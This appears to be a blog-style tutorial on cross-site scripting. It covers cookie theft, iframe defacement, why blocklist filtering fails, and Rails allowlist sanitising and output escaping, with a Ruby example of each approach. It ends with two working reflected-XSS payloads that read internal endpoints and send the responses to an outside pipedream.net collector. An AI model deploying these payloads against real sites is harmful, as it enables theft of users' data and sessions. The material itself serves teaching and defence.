- XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
- An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute it. Because the browser thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. Such scripts can even rewrite the content of the HTML page. An attacker injects some code, the web application saves it and displays it on a page that is later presented to a victim. Most XSS examples simply display an alert box, but XSS is more powerful than that: it can steal the cookie, hijack the session, redirect the victim to a fake website, display advertisements for the benefit of the attacker, change elements on the web site to harvest confidential information, or install malicious software through security holes in the web browser.
- The most common entry points are message posts, user comments, and guest books, but project titles, document names, and search result pages have also been vulnerable: just about anywhere the user can input data. The input does not necessarily have to come from input boxes on web sites; it can be in any URL parameter, whether obvious, hidden or internal. Remember that the user may intercept any traffic; applications or client-side proxies make it easy to change requests. There are also other attack vectors like banner advertisements.
- There are different types of XSS, such as Stored XSS and Reflected XSS, but I will not be covering them here. There is plenty of information available online about the types and you can read up on it. I will show a live demo of XSS and how you can find it using Kali Linux and DVWA.
- The most common XSS language is of course the most popular client-side scripting language JavaScript, often in combination with HTML. Escaping user input is essential.
- Here is the most straightforward test to check for XSS. This JavaScript code will simply display an alert box.
- These examples don't do any harm so far, so let's see how an attacker can steal the user's cookie (and thus hijack the user's session). In JavaScript you can use the document.cookie property to read and write the document's cookie. JavaScript enforces the same-origin policy, which means a script from one domain cannot access cookies of another domain. The document.cookie property holds the cookie of the originating web server. However, you can read and write this property if you embed the code directly in the HTML document (as happens with XSS). Inject this anywhere in your web application to see your own cookie on the result page.
- For an attacker, of course, this is not useful, as the victim will see their own cookie. The next example will try to load an image from the URL http://www.hackerwebsite.com plus the cookie. Of course this URL does not exist, so the browser displays nothing, but the attacker can review their web server's access log files to see the victim's cookie.
- With web page defacement an attacker can do a lot of things, for example present false information or lure the victim to the attacker's web site to steal the cookie, login credentials, or other sensitive data. The most popular way is to include code from external sources via iframes.
- This loads arbitrary HTML and/or JavaScript from an external source and embeds it as part of the site. A more specialized attack could overlay the entire web site or display a login form which looks the same as the site's original but transmits the user name and password to the attacker's site. Or it could use CSS and/or JavaScript to hide a legitimate link in the web application and display another one in its place which redirects to a fake web site.
- It is very important to filter malicious input, but it is also important to escape the output of the web application. Especially for XSS, it is important to use permitted-list (allowlist) input filtering rather than restricted-list (blocklist) filtering: a permitted list states the values that are allowed, whereas a restricted list enumerates the values that are not, and restricted lists are never complete. Let's take a look at why restricted lists do not work.
- Imagine a restricted list that deletes "script" from the user input. Now the attacker injects "<scrscriptipt>", and after the filter has run once, "<script>" remains. Earlier versions of Rails used a restricted-list approach for the strip_tags(), strip_links() and sanitize() methods, so this kind of injection was possible: the call returned "some<script>alert('hello')</script>", which makes the attack work.
- That's why a permitted-list approach is better, using the updated Rails 2 sanitize() method. This allows only the given tags and does a good job, even against all kinds of tricks and malformed tags.
- As a second step, it is good practice to escape all output of the application, especially when re-displaying user input which hasn't been input-filtered (as in the search form example earlier on). Use the escapeHTML() method (or its alias h()) to replace the HTML input characters &, ", <, and > with their uninterpreted representations in HTML (&amp;, &quot;, &lt;, and &gt;).
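As an added example (not from the original post and not Rails' own code), the three approaches side by side in plain Ruby: a one-pass restricted-list filter that the "<scrscriptipt>" trick defeats, output escaping as h() does it, and a small permitted-list sanitizer built by escaping everything and re-enabling only bare allowlisted tags. The function names and the allowlist are this example's own.

```ruby
# Added example, not from the original post: restricted-list filtering beside
# the two approaches the text recommends (output escaping and a permitted list).
# Uses only Ruby's standard library; function names are this example's own.
require "cgi"

# Restricted list: delete the word "script" once. This is the behaviour the
# text attributes to early Rails helpers, and it is trivially bypassed.
def restricted_strip(input)
  input.gsub("script", "")
end

# Output escaping: every HTML metacharacter becomes an entity, so whatever the
# user typed is rendered as text and never parsed as markup. Rails' h() /
# ERB::Util.html_escape behaves the same way (both also escape the quote ').
def escape_html(input)
  CGI.escapeHTML(input)
end

# Permitted list: escape everything, then re-enable only bare, attribute-free
# tags from the allowlist. Anything else, including an allowed tag that carries
# an attribute such as onmouseover, stays escaped and is therefore inert.
ALLOWED_TAGS = %w[b i em strong].freeze  # constructed allowlist for the example

def sanitize_allowlist(input, allowed = ALLOWED_TAGS)
  names = allowed.map { |t| Regexp.escape(t) }.join("|")
  escape_html(input).gsub(/&lt;(\/?)(#{names})&gt;/i) { "<#{$1}#{$2}>" }
end

if __FILE__ == $PROGRAM_NAME
  payload = "<scrscriptipt>alert('hello')</scrscriptipt>"
  puts restricted_strip(payload)                  # the filter rebuilds <script>
  puts escape_html(payload)                       # fully escaped, renders as text
  puts sanitize_allowlist("<b>hi</b>" + payload)  # <b> kept, the rest escaped
end
```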
https://www.somewebsite.com/blog/?post_type=post&s=%3Cscript%3E+var+jq+%3D+document.createElement(%27script%27);+jq.src+%3D+%22https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js%22;+document.getElementsByTagName(%27head%27)[0].appendChild(jq);+jQuery.noConflict();+setTimeout(function()+{$.ajax({url:%27/video/category%27,+method:%27GET%27,+success:+function(resp)+{setTimeout(function()+{$.ajax({url:%27https://enek0fazyag.x.pipedream.net%27,+method:%27PUT%27,+data:+JSON.stringify(resp),+success:+function(resp)+{window.location+%3D+%22https://gauravsinghparweshwar.somewebsite.com/video/play/XAtjeDGN6Z0Eja1En--ENcBs-f9h_tt5WW4pg2UFZ7k%3Futm_source%3Dhv-campaigns%26hreferer%3Dprivate%26_%3D1587128561447%22;}>})},+500)}})},+500)+%3C/script%3E
```html
https://www.somewebsite.com/blog/?post_type=post&s=
<script> var jq = document.createElement('script');
jq.src = "https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js";
document.getElementsByTagName('head')[0].appendChild(jq);
jQuery.noConflict();
setTimeout(function() {
$.ajax(
{url:'/video/delivery/user_info', method:'GET', success: function(resp) {setTimeout(function() {
$.ajax({url:'https://enek0fazyag.x.pipedream.net', method:'GET', data: JSON.stringify(resp), success: function(resp) {alert(JSON.stringify(resp))}})}, 500) }})}, 500)
</script>
```